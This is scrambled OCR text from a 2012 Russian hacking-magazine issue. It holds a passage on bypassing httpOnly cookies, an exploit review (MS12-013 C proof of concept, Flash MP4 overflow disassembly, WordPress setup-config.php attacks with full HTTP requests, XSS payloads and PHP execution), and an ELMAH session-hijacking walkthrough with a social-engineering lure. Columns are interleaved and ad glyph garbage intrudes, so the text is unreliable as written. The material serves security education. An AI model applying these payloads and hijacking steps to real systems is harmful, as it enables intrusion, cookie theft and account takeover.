то в качестве его родного домена определяется то место, где чиями. Файл политик называется clientaccesspolicy.xml, однако
он хостится фактически, а не то, где он вставлен в страницу. если Silverlight его не находит, то ищется crossdomain.xml.
Во-вторых, при отсутствии crossdomain.xml флэшу на самом Сам же clientaccesspolicy.xml не поддерживает использование
деле не «запрещается все», как считают многие. В таком случае символа множества («*») для описания доменов и не различает
флэшу можно указать альтернативный файл политик, назы- http- и https-протоколы. Так что через него также можно вы-
вающийся по-другому и лежащий на victim.com. В-третьих, полнять действия от имени пользователя, если только повезет
файлы crossdomain.xml могут лежать и в папках. Но должно с xml’ками.

ОБОЙТИ ФЛАГ COOKIES HTTPONLY

ЗАДАЧА

РЕШЕНИЕ
XSS – это одна из самых распространенных ныне уязвимостей
веб-приложений. К тому же она очень опасна, потому что по сути
мы можем выполнять почти любые действия от имени пользова-
теля. Но если все же вернуться к классике, то итогом XSS долж-
на быть украденная сессия пользователя. Так как чаще всего
авторизация юзера происходит именно по кукисам, то целью атаки
с использованием XSS является их угон. Чаще всего это можно
сделать с помощью данных из переменной document.cookie. Но все
несколько затруднилось, когда появился такой чудо-браузер, как
IE6. Разработчики внедрили в него специальный флаг httpOnly.
Основная его задача заключается в том, чтобы указать браузеру,
что данную куку нельзя доставать из javascript. Ага, идея хорошая.
Вот только с реализацией не так все здорово, ведь по идее флаг
должны выставлять сами разработчики ПО, которые до сих пор
этим пренебрегают.
Теперь давай предположим, что «httpOnly» установлен. Как
Apache 2.2. Большой заголовок приводит к ошибке с раскрытием кукисов
его обойти? Бородатый метод – cross-site tracing. Придуман он
аж в 2003 году и основан на том, что многие веб-серверы наряду
с GET- и POST-методами поддерживают еще и TRACE-метод. Дан-
ный метод крайне прост: веб-сервер возвращает полностью весь
запрос, который был отправлен клиентом. То есть получается так:
мы должны внедрить через XSS такой код, который должен будет
отправить любой запрос на тот же сервер с методом TRACE, а затем
прочитать пришедший ответ. В этом ответе кроме искомых кукисов
могут содержаться и другие интересные данные (basic или ntlm-
аутентификация). Важно упомянуть, что многие веб-серверы до сих
пор поддерживают данный метод.
TRACE-запрос. Веб-сервер возвращает все, что ему послали. Даже куки
Кроме всего этого существуют также и несколько зависимых
от сервера возможностей. Новым и крайне забавным примером
является Apache. Если точнее, то вся его ветка 2.2 вплоть до вер- клиентом запрос. Чтобы создать такой запрос, требуется всего
сии 2.2.22. Логика здесь такая же, как и в случае с TRACE, только лишь отправить легитимный пакет с очень большим заголовком.
куки возвращаются в ответе об ошибке веб-сервера. Норман В PoC’е автора используется простейшая реализация этого бага:
Хипперт (Norman Hippert, goo.gl/ndGpv) обнаружил, что при ошибке с помощью javascript он выставляет большое количество длинных
400 (HTTP 400 Bad Request) возвращается весь отправленный кукисов и отправляет запрос на сервер.

048 ХАКЕР 04 /159/ 2012

 ПОДПИШИСЬ!
shop.glc.ru
Редакционная подписка без посредников —
это гарантия получения важного для Вас
журнала и экономия до 40% от розничной
цены в киоске

8-800-200-3-999
6 номеров — 1110 руб. 6 номеров — 1110 руб.
13 номеров — 1999 руб. 13 номеров — 1999 руб. +7 (495) 663-82-77 (бесплатно)

6 номеров — 564 руб. 6 номеров — 1110 руб. 6 номеров — 810 руб. 6 номеров — 1110 руб.
13 номеров — 1105 руб. 13 номеров — 1999 руб. 13 номеров — 1499 руб. 13 номеров — 1999 руб.

6 номеров — 630 руб. 6 номеров — 895 руб. 6 номеров — 1194 руб. 6 номеров — 894 руб.
13 номеров — 1140 руб. 13 номеров — 1699 руб. 13 номеров — 2149 руб. 13 номеров — 1699 руб.

 ¿
ěĈČʆĐđĎĆďĐ
AUDI A7 ČĐ¿ďþċʆĒĎþċĔĆďĈČ¿ĂČ¿ċĚĜʆćČĎĈþ
NEED FOR SPEED: THE RUN


ĀĆċĆĉČĀęă
ÿìøýìóôô


ðñõìíûćÚ
ÚѡѢÚÚ"./#.1
ûñõù÷ñøðùîìøøìĊÚāñøìÚ
òþûøìöìÚÚûþí

350.589



;8IEB?8G
ċ4@4EB
£ýēĞēĢĭŸàĜĥģēİĤģı
 
üÚĎĘĕĕēčĝďěĔēĖÚ
ü ïĘěęĘďēė
Ěċ
ĚċĒĖċğĘĖ ďēĚĐĔĜĘĚ
.EEDÝFORÝ3PEEDÝ4HEÝ2UNÝ
.E ýěÝúøïóĠÝĚĎÝ4OYOTAÝ#AMRY

6 номеров — 690 руб. 6 номеров — 775 руб. 6 номеров — 950 руб. 6 номеров — 810 руб.
13 номеров — 1249 руб. 13 номеров — 1399 руб. 13 номеров — 1699 руб. 13 номеров — 1499 руб.
 Павел Павел Александрович (ivinside.blogspot.com)
ВЗЛОМ / ОБЗОР ЭКСПЛОИТОВ Дмитрий Михайлович Дмитрий Михайлович (115612, дер. Красная звездочка, д.1)

0бзор
эксплоитов
И вновь мы с тобой встречаемся, чтобы разобраться во внутреннем устройстве последних
интереснейших образцов из области эксплоитостроения. Крепче хватайся за журнал и
внемли же слогу бинарному...

050 ХАКЕР 04 /159/ 2012

 Обзор эксплоитов

MS12-013: Уязвимость в библиотеке времени .text:6FFBEA20 push ebx ; mov ebx, [esi] in the entry block
1 выполнения C (msvcrt.dll) .text:6FFBEA21 call __calloc_crt

.text:6FFBEA26 pop ecx

CVSSV2 9.3 .text:6FFBEA27 pop ecx
.text:6FFBEA28 mov [edi], eax
(AV:N/AC:M/AU:N/C:C/I:C/A:C) .text:6FFBEA2A test eax, eax
BRIEF .text:6FFBEA2C jz short loc_6FFBEA1A
Msvcrt.dll — многопоточная библиотека динамической ком- .text:6FFBEA2E push [ebp+pulResult] ; size_t
поновки (DLL) времени выполнения C, которая используется .text:6FFBEA31 mov eax, [ebp+arg_8]
компонентами системного уровня. В способе расчета библиоте- .text:6FFBEA34 push [ebp+arg_4] ; void *
кой msvcrt.dll размера буфера в памяти существует уязвимость, .text:6FFBEA37 mov dword ptr [eax], 1
которая делает возможным удаленное выполнение кода и по- .text:6FFBEA3D push dword ptr [edi] ; void *
зволяет копировать данные в память, не выделенную должным .text:6FFBEA3F call _memcpy
образом. Эта уязвимость делает возможным удаленное выпол-
нение кода при запуске пользователем специально созданных .text:6FFBEA44 mov eax, [esi]
файлов мультимедиа. Если пользователь вошел в систему с .text:6FFBEA46 push esi ; pulResult
правами администратора, то злоумышленник, которому уда- .text:6FFBEA47 add eax, eax ; !!!!
лось воспользоваться уязвимостью, может установить полный .text:6FFBEA49 push 2 ; int
контроль над системой, после чего он сможет устанавливать .text:6FFBEA4B push eax ; int
программы, просматривать, изменять и уничтожать данные или .text:6FFBEA4C mov [esi], eax
создавать новые учетные записи с неограниченными правами. .text:6FFBEA4E call ?SizeTMult@@YAJIIPAI@Z
Риск для пользователей, учетные записи которых имеют огра- ; SizeTMult(uint,uint,uint *)
ниченные права, меньше, чем для пользователей, работающих с
правами администратора. .text:6FFBEA53 add esp, 18h
.text:6FFBEA56 test eax, eax
EXPLOIT .text:6FFBEA58 jge short loc_6FFBEA78
Патч от MS затрагивает функцию _ _check_float_string(). В связи
с тем, что библиотека времени выполнения C поставляется в Обрати внимание на аргументы функций _ _calloc_crt() и
виде исходников совместно с MS Visual Studio, посмотреть на SizeTMult(). В момент вызова _ _calloc_crt() мы имеем следующий
вышеупомянутую функцию можно в VC/CRT/src/input.c. набор аргументов: __calloc_crt(Size, 2). Однако в момент, когда
Логика работы у функции _ _check_float_string() следующая. для записи переменной размера вызывается функция SizeTMult,
С самого начала у библиотеки времени выполнения имеется ее набор аргументов выглядит так:
буфер статического размера (_TCHAR floatstring[_CVTBUFSIZE
+ 1];). Как только требуется буфер большего размера, проис- SizeTMult(Size*2, 2, &pResult)
ходит перераспределение памяти. Порядок подобного пере-
распределения таков: выделяется удвоенный размер буфера и Посему, несмотря на реальный размер выделенной памяти
удваивается значение переменной, содержащей этот размер. под буфер в Size*2, в переменную размера сохраняется значение
При первой итерации увеличения используется вызов функции Size*2*2. В связи с этим переполнение кучи происходить будет,
calloc(), далее используется recalloc(). Основной момент, в связи но - за пределами рассматриваемой функции.
с которым имеет место быть MS12-013, состоит в попытке записи А это пропатченная версия. Вновь посмотрим на аргументы
нового размера буфера. SizeTMult(). В этот раз имеем SizeTMult(Size, 2, &pResult). В
Ниже приведен дизасм-листинг старой версии msvcrt.dll: итоге MS пришлось избавиться от инструкции «add eax, eax»:

.text:6FFBEA1E loc_6FFBEA1E: ; CODE XREF: sub_6FFBE9F3+25|j .text:6FFBF935 push [ebp+pulResult] ; size_t

.text:6FFBEA1E push 2 .text:6FFBF938 mov eax, [ebp+arg_8]
.text:6FFBF93B push [ebp+arg_4] ; void *
.text:6FFBF93E mov dword ptr [eax], 1
.text:6FFBF944 push dword ptr [esi] ; void *
.text:6FFBF946 call _memcpy
.text:6FFBF94B push edi ; pulResult
.text:6FFBF94C push 2 ; int
.text:6FFBF94E push dword ptr [edi] ; int
.text:6FFBF950 call ?SizeTMult@@YAJIIPAI@Z
; SizeTMult(uint,uint,uint *)
.text:6FFBF955 add esp, 18h

POC для MS12-013:

#include <windows.h>
#include <stdio.h>

#pragma comment(linker, "/NODEFAULTLIB:msvcrt90.lib")

#pragma comment(linker, "/NODEFAULTLIB:msvcrt80.lib")

#pragma comment(lib, "vs6/msvcrt.lib")

check_float_string из CRT

ХАКЕР 04 /159/ 2012 051

ВЗЛОМ / ОБЗОР ЭКСПЛОИТОВ

#define BUF_SIZE 0x300 Adobe Flash Player: переполнение буфера при

2 обработке MP4 в
void main( void ) SequenceParameterSetNALUnit
{
char *pStr; CVSSV2 10.0
float f;
int i; (AV:N/AC:L/Au:N/C:C/I:C/A:C)
BRIEF
pStr = (char*)malloc(BUF_SIZE); 10 февраля 2012 года в составе metasploit-а появился новый модуль,
memset(pStr, 0, BUF_SIZE); отвечающий за уязвимость в обработке mp4-файлов, которая осу-
strcpy(pStr, "1."); ществляется компонентом Flash10u.ocx Adobe Flash Player. Ошибка
располагается в sequenceParameterSetNALUnit. Когда происходит
for( i=1; i<=BUF_SIZE-10; i++) обработка значения num_ref_frames_in_pic_order_cnt_cycle, раз-
{ мер копируемых данных никак не проверяется, и процесс Flash’а
strcat(pStr, "0"); бездумно копирует подконтрольные пользователю данные из
} offset_for_ref_frame в буфер фиксированного размера, располагаю-
щийся на стеке. В результате это приводит к удаленному выполне-
printf("Before scanf()\n"); нию произвольного кода в контексте пользователя, запустившего
процесс Flash-а. Многочисленные сообщения об этой уязвимости
sscanf(pStr,"%f", &f); также указывают на то, что она активно использовалась ITW.

printf("After scanf()\n"); EXPLOIT

Дизасм уязвимого места (функция sub_1005B396), Flash10u.ocx
printf("%f\n", f); 10.3.181.34:
}
.text:1005B482 call SubReadUExpGlomb
TARGETS ; читаем pic_order_cnt_type
Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 .text:1005B487 mov [esi+40h], eax
.text:1005B48A cmp eax, ebp
SOLUTION ; если pic_order_cnt_type != 0 (ebp=0)
Существует обновление, устраняющее данную уязвимость .text:1005B48C jnz short loc_1005B49D
. ; ...

ms12-013: результат переполнения кучи

052 ХАКЕР 04 /159/ 2012

 Обзор эксплоитов

.text:1005B49D xor ebx, ebx

.text:1005B49F inc ebx
.text:1005B4A0 cmp eax, ebx
.text:1005B4A2 jnz short loc_1005B4EF
; если pic_order_cnt_type != 1
.text:1005B4A4 mov ecx, edi
.text:1005B4A6 call SubReadBit
; читаем delta_pic_order_always_zero_flag
.text:1005B4AB mov ecx, edi
.text:1005B4AD mov [esi+48h], al
.text:1005B4B0 call SubReadSExpGlomb
; читаем offset_for_non_ref_pic
.text:1005B4B5 mov ecx, edi
.text:1005B4B7 mov [esi+54h], eax
.text:1005B4BA call SubReadSExpGlomb
; читаем offset_for_non_ref_pic
.text:1005B4BF mov ecx, edi
.text:1005B4C1 mov [esi+50h], eax
.text:1005B4C4 call SubReadUExpGlomb
; читаем num_ref_frames_in_pic_order_cnt_cycle
.text:1005B4C9 mov [esi+4Ch], eax
.text:1005B4CC test eax, eax
.text:1005B4CE jbe short loc_1005B4EF
; если num_ref_frames_in_pic_order_cnt_cycle == 0
.text:1005B4D0 lea eax, [esi+58h]
.text:1005B4D3 mov [esp+10h+ptr], eax
.text:1005B4D7
.text:1005B4D7 loc_1005B4D7:
; CODE XREF: SubParseSeqParameterSet+157|j
.text:1005B4D7 mov ecx, edi
.text:1005B4D9 call SubReadSExpGlomb
; читаем offset_for_ref_frame
.text:1005B4DE mov ecx, [esp+10h+ptr]
.text:1005B4E2 add [esp+10h+ptr], 4
.text:1005B4E7 inc ebp ; ebp - счетчик цикла
.text:1005B4E8 mov [ecx], eax
; ecx указывает на буфер на стеке
.text:1005B4EA cmp ebp, [esi+4Ch] ; сравниваем счетчик
Параметры, принимаемые скриптом setup-config.php, никак не фильтруются
; c num_ref_frames_in_pic_order_cnt_cycle
.text:1005B4ED jb short loc_1005B4D7
Claudius) опубликовала очередную пачку уязвимостей в движке
Функция SubReadUExpGlomb() читает из файла экспоненци- WordPress. Среди них - исполнение произвольного PHP-кода,
альный код Голомба и декодирует его в беззнаковое число. множественные XSS-уязвимости, а также раскрытие имени поль-
SubReadSExpGlomb() читает экспоненциальный код Голомба и деко- зователя и пароля для подключения к серверу MySQL.
дирует его в знаковое число. Функция SubReadBit() производит чтение
одного бита. Как видишь, в вышеприведенном коде не производится EXPLOIT
никаких проверок на значение num_ref_frames_in_pic_order_cnt_ 1. Исполнение произвольного PHP-кода и хранимая XSS в скрипте
cycle. Вдобавок ко всему Flash Player не использует такой защитный setup-config.php. Сценарий исполняется в процессе инсталляции
механизм как stack cookies, поэтому атакующий может получить WordPress и позволяет устанавливать движок с использованием ло-
контроль над регистром eip без каких-либо проблем. кальной или удаленной базы данных MySQL. Для этого необходимо
располагать валидными реквизитами для доступа к MySQL. Однако
TARGETS злоумышленник может поднять свой собственный сервер MySQL
Adobe Flash Player <= 10.3.181.36 и использовать его в процессе установки, при этом не располагая
логином/паролем к MySQL на целевой системе. После успешной ин-
SOLUTION сталляции WordPress злоумышленник может внедрить произволь-
Обновиться до версии 10.3.183.5 ный PHP-код через редактор тем WordPress. В дополнение к этому,
благодаря доступу к базе данных WordPress становится возможным
внедрить произвольный Javascript-код в контент движка, тем самым
Множественные уязвимости в WordPress реализуя уязвимость хранимой XSS.
3 Атака проводится следующим образом. Допустим, A.B.C.D - целевой
сервер с WordPress, а W.X.Y.Z - сервер злоумышленника с установ-
CVSSV2 7.5 ленной MySQL.
Посылаем POST- и GET-запросы для установки WordPress с исполь-
(AV:N/AC:L/Au:N/C:P/I:P/A:P) зованием базы данных злоумышленника:
BRIEF
В конце января компания Trustwave SpiderLabs в POST-запрос
лице исследователя Джонатана Клаудиуса (Jonathan POST /wp-admin/setup-config.php?step=2 HTTP/1.1

ХАКЕР 04 /159/ 2012 053

ВЗЛОМ / ОБЗОР ЭКСПЛОИТОВ

Host: A.B.C.D 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6;
rv:8.0.1) Gecko/20100101 Firefox/8.0.1 2. Множественные XSS в скрипте setup-config.php. В процессе ин-
Accept: text/html,application/xhtml+xml, сталляции злоумышленник может внедрить Javascript-код через
application/xml;q=0.9,*/*;q=0.8 параметры «dbname», «dbhost» или «uname». Это реализуется
Accept-Language: en-us,en;q=0.5 через следующий POST-запрос:
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 POST /wp-admin/setup-config.php?step=2 HTTP/1.1
Proxy-Connection: keep-alive Host: A.B.C.D
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X
Cookie: wp-settings-time-1=1322687480; 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
wp-settings-1=m9%3Do Accept: text/html,application/xhtml+xml,
Content-Type: application/x-www-form-urlencoded application/xml;q=0.9,*/*;q=0.8
Content-Length: 81 Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
dbname=wordpress&uname=jsmith&pwd=jsmith&dbhost=W.X.Y.Z Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
&prefix=wp_&submit=Submit Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
GET-запрос Content-Type: application/x-www-form-urlencoded
GET /wp-admin/install.php HTTP/1.1 Content-Length: 112
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X dbname=%3Cscript%3Ealert%28%27123%27%29%3C%2Fscript%3E&
10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 uname=root&pwd=&dbhost=localhost&prefix=wp_&submit=Submit
Accept: text/html,application/xhtml+xml,
application/xml;q=0.9,*/*;q=0.8 3. Раскрытие реквизитов для доступа к базе данных MySQL через
Accept-Language: en-us,en;q=0.5 скрипт setup-config.php. В процессе инсталляции пользователь
Accept-Encoding: gzip, deflate задает параметры базы данных MySQL, как уже обсуждалось
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 ранее. При вводе неправильных реквизитов скрипт выдает ошиб-
Proxy-Connection: keep-alive ку, чем и можно воспользоваться, осуществляя брутфорс имени
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=2 пользователя и пароля к MySQL, причем не только локальной, но и
Cookie: wp-settings-time-1=1322687480; любой удаленной. Запрос выглядит следующим образом:
wp-settings-1=m9%3Do
If-Modified-Since: Wed, 07 Dec 2011 16:03:33 GMT POST /wp-admin/setup-config.php?step=2 HTTP/1.1
Host: A.B.C.D
С помощью редактора тем WordPress редактируем файл 404.php User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X
(или любой другой, доступный в используемой теме), тем самым 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
реализуя возможность исполнения PHP-кода: Accept: text/html,application/xhtml+xml,
application/xml;q=0.9,*/*;q=0.8
<?php Accept-Language: en-us,en;q=0.5
phpinfo(); Accept-Encoding: gzip, deflate
?> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Исполняем код с помощью GET-запроса или просто открыв стра- Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
ницу в браузере: Content-Type: application/x-www-form-urlencoded
Content-Length: 32
GET /wp-content/themes/default/404.php HTTP/1.1
Host: A.B.C.D uname=user&pwd=pass&dbhost=L.M.N.O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X
10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 В нем делается попытка коннекта к серверу L.M.N.O пользовате-
лем user и паролем pass.
Также злоумышленник может использовать хранимую XSS для
атаки на пользователей, — для этого необходимо выполнить TARGETS
такой запрос: WordPress 3.3.1 и более ранние.

UPDATE wp_comments SET SOLUTION

comment_content='<script>alert('123')</script>' where Так как уязвимый скрипт - инсталляционный, разработчики
comment_content='Hi, this is a comment.<br />To delete WordPress посчитали возможность реализации этих уязвимостей
a comment, just log in and view the post&#039;s крайне малой и не стали выпускать официальных патчей. «Ни один
comments. There you will have the option to edit нормальный пользователь не будет оставлять инсталляционных
or delete them.'; скриптов у себя на сервере или прерывать процесс установки», -
считают они. Однако некоторые хостинговые компании предостав-
Когда пользователь зайдет по ссылке, указанной в следующем GET- ляют аккаунты, в которых по умолчанию присутствуют дистрибутивы
запросе, в его браузере выполнится внедренный Javascript-код: WordPress с установочными скриптами, а клиент их может даже и не
планировал использовать. Для защиты своих серверов от этих атак
GET /?p=1 HTTP/1.1 можно порекомендовать лишь пользоваться сложными паролями к
Host: A.B.C.D MySQL, а также использовать WAF, например, ModSecurity, в правилах
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X которого учтены подобного рода атаки. z

054 ХАКЕР 04 /159/ 2012

ВЗЛОМ Илья Вербицкий (blog.chivavas.org)

ASP.NET:
ТЕМНАЯ СТОРОНА DVD
На нашем диске
ты найдешь

ТРАССИРОВКИ
исходник уязвимого
приложения Music
Store

ЭКСПЛУАТИРУЕМ СИСТЕМУ РЕГИСТРАЦИИ

И МОНИТОРИНГА ИСКЛЮЧЕНИЙ ELMAH
Одним из инструментов, применяемых для НЕМНОГО ОБ ОТЛАДЧИКАХ
поиска и исправления ошибок в программах, Использование отладчика — это гарантия того, что ошибка будет
как минимум обнаружена и, если повезет, исправлена. Но, к со-
являются отладчики и трассировщики жалению, существует множество ситуаций, когда программист не
— специальные утилиты, выполняющие может прибегнуть к помощи этого мощного средства. Во-первых,
не все ошибки можно отладить. Классический пример — тупико-
программу по шагам, чтобы понять, что вообще вые ситуации (deadlock) в многопоточном приложении: запускаешь
происходит. Сегодня речь пойдет о взломе EL- приложение в отладчике — все работает, без него — программа
«падает». Во-вторых, отладчик не всегда доступен. Например, тебе
MAH — популярного средства для трассировки никто не разрешит устанавливать средства разработки на сервере
ASP.NET-приложений. высоконагруженного web-приложения. Или другой пример: я уве-
рен на 99%, что ты не найдешь отладчик на компьютере бухгалтера
Мариванны, которая использует твою «складскую» программу. Тут
встает резонный вопрос: а что делать-то? Ответ нашли еще на заре
появления компьютерной техники: трассировка — это получение
информационных сообщений во время выполнения программы:
какие были исключения, что ввел пользователь, чем программа
занимается в данный момент и так далее. Средства трассировки
приложений — это очень мощные, но в то же время и потенци-
ально опасные инструменты, ведь они могут предоставить много
полезной информации для хакеров. Такие «ошибки» особенно
широко распространены в корпоративном софте, который пишется
Web-интерфейс лога ELMAH для внутренних нужд компаний. Программисты в корпорациях

056 ХАКЕР 04 /159/ 2012

 ASP.NET: темная сторона трассировки

СТАРАЯ УЯЗВИМОСТЬ

ELMAH — это далеко не первый пример,

когда средство, предназначенное для
облегчения жизни разработчиков, позволяло
злоумышленникам получать доступ
к системной информации. В 2007 году была
зарегистрирована похожая уязвимость
в системе трассировки web-приложений,
идущей в поставке ASP.NET. Web-страница
Trace.axd, как и ELAMH, предоставляла
слишком много информации в открытом
доступе. Этот факт позволял хакерам легко
и просто угонять сессии авторизованных
пользователей. Дополнительная информация
об уязвимости доступна на сайте Rapid7.
Как видишь, на странице поиска альбома возможна SQL-инъекция

стараются сделать жизнь службы поддержки (да, собственно, Теперь давай перейдем от слов к делу. В качестве примера
и свою) как можно проще, поэтому чаще всего доступ к различ- я решил использовать учебное web-приложение ASP.NET MVC
ным системным сообщениям и трассировке неограничен. Зачем Music Store, которое ты сможешь найти на нашем диске. Также
усложнять систему, когда доступ извне защищают бравые парни из оно доступно в интернете на сайте CodePlex, но уже без инте-
службы безопасности? А об инсайдерах, как обычно, забыли, хотя, грации с ELMAH, так что в этом случае я рекомендую обратиться
если верить статистике, 80% успешных взломов корпоративных к официальному сайту проекта для получения дополнительной
систем производится именно ими. информации. Ты можешь запускать данное web-приложение не-
посредственно из Visual Studio или зарегистрировать его в IIS. Я
ЧТО ТАКОЕ ELMAH? буду использовать второй вариант и создам новое приложение,
ELMAH (расшифровывается как Error Logging Modules and доступное по адресу http://localhost/MusicStore.
Handlers) — это продукт с открытым исходным кодом, разработан-
ный Атифом Азизом (Atif Aziz). Данная система облегчает задачу НЕМНОГО ТЕОРИИ
регистрации и мониторинга необработанных исключений в при- Для начала давай посмотрим, что же интересного можно найти
ложениях, разработанных на ASP.NET. Несмотря на свою молодость в отчете об обычном исключении в ELMAH. Открой Music Store
(ELMAH 1.1 был зарегистрирован в репозитории NuGet 11 января и войди в магазин как администратор, воспользовавшись ссыл-
2011 года), проект очень популярен в среде разработчиков сайтов кой Admin в правом верхнем углу страницы. Имя пользователя
под .NET. На момент написания статьи он находился на четырнад- и пароль по умолчанию admin и p@ssw0rd соответственно. Теперь
цатой строчке среди пакетов, доступных в NuGet, а библиотеку давай сгенерируем какое-нибудь исключение. Наш сайт основан
скачали 45 583 человека. на ASP.NET MVC, так что проще всего запросить несуществующую
Секрет популярности ELMAH кроется в его простоте. Интегра- страницу, так как ошибка 404, конечно же, сгенерирует исключе-
ция с любым web-приложением происходит при помощи всего ние. Получилось? Отлично. Теперь можно посмотреть, какую же
нескольких щелчков мышки: добавляешь библиотеку в проект при информацию мы сможем вытянуть. Для этого открывай web-
помощи NuGet и готово! Кроме того, если ты захочешь использо- интерфейс ELMAH, который доступен по адресу http://localhost/
вать ELMAH с уже существующим кодом, то тебе не потребуется MusicStore/elmah.axd. Как видишь, последняя исключительная
заново его компилировать! Просто скопируй необходимые сборки ситуация, зарегистрированная ELMAH, это ошибка 404, которую мы
в проект и подправь Web.config. Все заработает на ура. Несмотря на сами только что воспроизвели. Дальше давай посмотрим, что же
простоту использования, ELMAH обладает богатым функционалом: именно записал ELMAH. Нажми на ссылку Details и внимательно
здесь присутствует возможность сохранения информации об ошиб- посмотри на логи. Во-первых, ELMAH сохраняет как можно больше
ках в различные базы данных, существуют сервисы уведомления информации об исключении: его тип, сообщение об ошибке и стек
разработчиков по электронной почте или через RSS и так далее. вызовов. Что все это может дать злоумышленнику? Многое. Очень
часто сообщение об ошибке содержит не предназначенную для
посторонних глаз системную информацию, например информа-
цию о соединении с базой данных (включая имя пользователя
и пароль), информацию о состоянии объекта, в котором произошла
ошибка, и многое другое. Если ошибка произошла в коде интернет-
магазина, то там могут оказаться и данные кредитной карты поль-
зователя! На мой взгляд, стек вызовов не может принести столько
вреда, сколько текст сообщения об ошибке, но я не думаю, что ты
захочешь раскрывать злоумышленнику какую-либо информацию
об устройстве твоего приложения. Также стоит отметить, что со-
общения об ошибках в логах ELMAH никак не связаны с параме-
тром customErrors в ASP.NET, который используется для сокрытия
чувствительной информации от пользователя web-приложения. Ты
можешь скрыть от пользователя информацию о необработанном
Угоняем сессию пользователя исключении, установив customError в режим on (включен), но это

ХАКЕР 04 /159/ 2012 057

ВЗЛОМ

не поможет тебе скрыть эту информацию от ELMAH, в журнале ты

найдешь полное описание ошибки.
Идем дальше. ELMAH не ограничивается регистрацией исклю-
чения. Он также записывает информацию и о запросе, повлек-
шем за собой некорректную работу сайта, сохраняя, например,
такие серверные переменные, как HTTP_COOKIE, HTTP_HOST,
HTTP_USER_AGENT и тому подобные. Наибольший интерес для нас
представляют серверные переменные HTTP_COOKIE и AUTH_USER.
Переменная AUTH_USER содержит имя пользователя, который
выполнил запрос. В твоем случае значение этой переменной будет
Получаем список пользователей Music Store с помощью SQL-инъекции
равно admin. Переменная HTTP_COOKIE содержит куки пользова-
теля. Если он был авторизован на сайте, то в переменной должно
быть значение куки .ASPXAUTH. Этот кукис используется для ASP.NET_SessionId=3dljmclkhjpat52quopccijj;
проверки подлинности запроса от определенного пользователя. .ASPXAUTH=CDB45013DD38AD7D2759BA6FAA7D98F07
Таким образом, если пользователь находится на сайте, ты можешь ...
создать похожие куки в своем браузере и угнать сессию данного B84C6CB5BCC76E7AE899690CC2016B5F1BCE9CDCBAA
пользователя. Кроме того, я рекомендую обратить внимание на
кукис с именем ASP.NET_SessionId. В нем хранится идентификатор Осталось создать подобные куки в твоем браузере. Для этой
сессии атакуемого пользователя. Его стоит похитить на случай, цели я использую браузер Firefox с плагинами Firebug и Firecookie.
если в сессии приложения хранится что-нибудь важное. Теперь Кукис ASP.NET_SessionId скорее всего уже существует, поэтому
у тебя есть достаточно информации для проведения атаки на просто обнови его значение. После этого создай кукис .ASPXAUTH.
пользователя системы. Она довольно проста: ты должен найти ак- Вот и все! Далее перезагрузи страницу и открой раздел админи-
тивную сессию авторизованного пользователя и скопировать куки стрирования сайта, щелкнув по ссылке Admin в правом верхнем
.ASPXAUTH и ASP.NET_SessionId в свой браузер. углу главной страницы. Если все верно, и сессия пользователя
еще активна, то ты войдешь в админку, не зная при этом пароль
УГОНЯЕМ СЕССИИ ПОЛЬЗОВАТЕЛЕЙ администратора сайта.
План действий понятен. Переходим к его непосредственной реали-
зации. Первым делом открой лог ELMAH и посмотри информацию И ЭТО ЕЩЕ НЕ ВСЕ
о последних исключениях. Есть шанс, что среди них обнаружится ELMAH не только позволяет подключаться к активным сессиям
информация об активной в данный момент сессии. В этом случае ты пользователей, но и существенно облегчает поиск уязвимо-
можешь смело переходить к следующему шагу. Если тебе не повезло, стей на сайте. Давай в качестве примера проведем атаку типа
то остаются два возможных варианта действий. Во-первых, ELMAH SQL Injection на наш Music Store. Я специально добавил такую
распространяет информацию об ошибках через RSS. Добавь канал уязвимость в учебный пример — в оригинальной версии Music
http://localhost/MusicStore/elmah.axd/rss в читалку RSS и спокойно Store от Microsoft данная проблема отсутствует. Давай посмо-
жди, пока появится возможность для угона сессии :). Нет времени трим, как устроена страница поиска альбома. Открывай http://
ждать? Тогда тебе на помощь придет социальная инженерия. Пред- localhost/MusicStore/Search. Как видишь, здесь есть только поле
положим, что ты решил взломать какое-нибудь внутрикорпоративное для поиска и кнопка сабмита. Теперь необходимо удостовериться,
приложение (именно там чаще всего можно встретить незащищен- возможно ли выполнить SQL-запрос, да и вообще, есть ли доступ
ный ELMAH). Попробуй отправить в службу поддержки следующее к базе данных на этой странице. У тебя есть доступ к ELMAH, зна-
сообщение: «Здравствуйте. Сегодня у меня перестало открываться чит, можно упростить себе жизнь и попробовать сгенерировать
приложение Music Store, постоянно выводится ошибка 404. Пример исключение. Введи что-либо наподобие "' or select 1 from abcdef".
ссылки, которую я пытаюсь открыть: http://localhost/MusicStore/Store/ Скорее всего, в базе данных не будет таблицы с именем abcdef
Browse>aspx". Особенность ссылки в том, что страница сгенериру- (я бы за такую таблицу руки разработчику оторвал). Как и ожи-
ет ошибку 400 «Плохой запрос», которая будет записана в журнал далось, поиск вызвал исключительную ситуацию в коде. Теперь
ошибок ELMAH. Теперь осталось ждать, пока сотрудник службы под- необходимо удостовериться, действительно ли на странице воз-
держки перейдет по ссылке. Скорее всего, он уже авторизован на сай- можна SQL-инъекция. Открывай лог ELMAH и смотри последнее
